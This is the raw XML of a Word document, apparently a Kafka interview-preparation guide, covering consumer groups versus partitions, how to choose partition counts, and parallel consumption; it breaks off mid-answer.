        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C017D4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037"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="6895E181" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="302FA95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2F80505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46DA784" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58F906E6"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648A9B1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te topics, offsets across clusters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="1A3F39D6" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC02FB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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00F38B9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 during retry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="3B1695CB" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="069A84A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OS (Exactly Once Semantics)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70DF218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only once</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="364AE6EE" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C7D692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plication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="223715C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schema consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="5252F8C4" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="728A136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sync (MM2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="361803B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0B3FAE18" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="541E520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Passive setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A3D42FD"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aster recovery, low conflict</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="0E9C75FA" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25067B7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Active setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04BAD57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ad balancing across regions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="2807AFB7" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2366A45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ing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33BB004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lag, replication failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4583169F" w14:textId="69880F7F" w:rsidR="00CA2729" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CA2729">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="24BC5EA8">
          <v:rect id="_x0000_i3569" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="597FF0A0" w14:textId="260FC19B" w:rsidR="00CA2729" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2729" w:rsidP="00CA2729">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="879" w:name="_Toc197868093"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If we have more consumer groups than partitions and how will it manage?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="879"/>
    </w:p>
    <w:p w14:paraId="46A04C5B" w14:textId="2978AB67" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Here’s how Kafka handles the scenario when you have more consumer groups than partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6022D8C3"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1. Multiple Consumer Groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E29F5C"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Each consumer group will receive the same set of messages from the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1808633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Kafka guarantees that each partition is consumed by </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consumer in a consumer group at a time. But each consumer group will independently consume from all the partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D20F5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two</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consumer groups, each group will consume from the partitions in parallel, but each group will have its own set of consumers and partition assignments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A258F6"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2. More Consumer Groups than Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443BBA98"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more consumer groups than partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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However, within a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, each partition can only be consumed by one consumer at a time. If there are more consumers in a consumer group than partitions, the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extra consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will remain idle, as there are no more partitions to consume from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34651DDE"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637AE7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If you have 3 partitions and 5 consumer groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C8C0E"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of the 5 consumer groups will receive the data from the 3 partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6505CED9"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partition can be consumed by only one consumer per consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADD4BE7"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Since the number of consumer groups exceeds the number of partitions, the extra consumer groups will not have any impact on partition consumption but will consume the same messages independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B59412"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFE1E06"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ultiple consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can consume independently from the same partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D2C1D0"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ore consumers in a group than partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Some consumers will be idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31624FA9"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lastRenderedPageBreak/>
        <w:t>More consumer groups than partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each group consumes independently from the partitions, and no data loss happens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B0692" w14:textId="77777777" w:rsidR="00D87893" w:rsidRDefault="00000000" w:rsidP="00CA2729">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1DAB4">
          <v:rect id="_x0000_i3570" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3111A117" w14:textId="77777777" w:rsidR="00D87893" w:rsidRDefault="00D87893" w:rsidP="00D87893">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5DB438" w14:textId="7910F19A" w:rsidR="00D87893" w:rsidRPr="00D87893" w:rsidRDefault="00D87893" w:rsidP="00D87893">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="880" w:name="_Toc197868094"/>
      <w:r w:rsidRPr="00D87893">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">How will we decide the number of partitions, I have a microservice which is dealing with lots of data, so how will you decide x number of partitions for a </w:t>
      </w:r>
      <w:r w:rsidR="00354665" w:rsidRPr="00D87893">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00D87893">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> topic?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="880"/>
    </w:p>
    <w:p w14:paraId="690DF92B" w14:textId="744C5DCF" w:rsidR="008D3EB8" w:rsidRPr="0024025F" w:rsidRDefault="008D3EB8" w:rsidP="0024025F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024025F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The number of partitions in a Kafka topic is crucial for performance, scalability, and parallelism. The decision depends on the following factors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581CC362"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Throughput Requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62805B7E"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If your microservice is handling a large volume of data, you need more partitions to distribute the load and increase throughput. Kafka can handle higher throughput with more partitions because each partition can be consumed in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7142E941"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Consumer Parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFB65D0"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Kafka allows one consumer per partition in a consumer group. If you have multiple consumers, you should aim to have at least as many partitions as there are consumers to fully utilize your consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7DB87F"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allow for greater parallelism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BDB78"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Replication Factor</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF63D5"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A higher number of partitions helps ensure high availability and fault tolerance, but the replication factor also affects how many replicas of each partition exist. You need to balance the replication factor with the number of partitions to avoid overloading Kafka brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0765C909"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Partition Assignment Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DE0BE6"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Kafka’s partitioning strategy, such as using a key-based approach for partitioning, can help you decide the number of partitions based on how you distribute data. Ensure the number of partitions allows effective distribution and avoids data skew or bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B6825"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Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C573B5D"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reduce contention but might also lead to higher latency for certain operations. For low-latency scenarios, you may choose fewer partitions, but it may limit throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D5C96"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Kafka Broker Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F25E5CB"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More partitions require more broker resources (memory, disk, CPU). Ensure that your brokers have enough capacity to handle the desired number of partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED8DE4"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Future Growth</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03692219" w14:textId="77777777" w:rsidR="008D3EB8" w:rsidRPr="008D3EB8" w:rsidRDefault="008D3EB8" w:rsidP="008D3EB8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consider potential growth in data and consumers over time. It’s often easier to scale by adding partitions upfront than by increasing them later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734DCA62" w14:textId="77777777" w:rsidR="008D3EB8" w:rsidRPr="008D3EB8" w:rsidRDefault="008D3EB8" w:rsidP="008D3EB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Formula for deciding partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A59FF60"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Throughput per partition</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Understand the message size and processing speed. Calculate the number of partitions as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A6BD66"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Total throughput / throughput per partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBCBC62"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure the number of partitions is greater than or equal to the number of consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F93DCA1" w14:textId="77777777" w:rsidR="008D3EB8" w:rsidRPr="008D3EB8" w:rsidRDefault="008D3EB8" w:rsidP="008D3EB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3EB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In general, start with an estimated number based on the above factors and adjust as needed based on testing and monitoring Kafka’s performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8DEBC6" w14:textId="34F16C90" w:rsidR="008D3EB8" w:rsidRDefault="00000000" w:rsidP="008D3EB8">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D60102">
          <v:rect id="_x0000_i3571" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D3A83" w14:textId="068FD015" w:rsidR="00226C6A" w:rsidRPr="00D87893" w:rsidRDefault="00232793" w:rsidP="00226C6A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="881" w:name="_Toc197868095"/>
      <w:r w:rsidRPr="00232793">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Let's say you have topic with 10 partitions and you are getting data from all 10 partitions and your microservice will reading line by line even though data is present at 10 partitions and it will read through 1 partition at a time, so how will you handle this?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="881"/>
    </w:p>
    <w:p w14:paraId="0E3F6EFC" w14:textId="7EB0B3CA" w:rsidR="00096A40" w:rsidRPr="00096A40" w:rsidRDefault="00096A40" w:rsidP="006A2BB8">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I</w:t>
      </w:r>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">f your microservice is reading data from Kafka with 10 partitions but processing them sequentially (one partition at a time), it will result in inefficiency and potentially a bottleneck. To handle this, you should leverage </w:t>
      </w:r>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for better resource utilization and throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3291683A"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Here are the ways to handle this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F585922"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1. Increase Consumer Threads (Parallel Consumers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B601B95"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Kafka allows multiple consumers to consume data in parallel. If your microservice reads from one partition at a time, you need to configure multiple consumer threads to read from multiple partitions concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410EFFB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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00096A40">
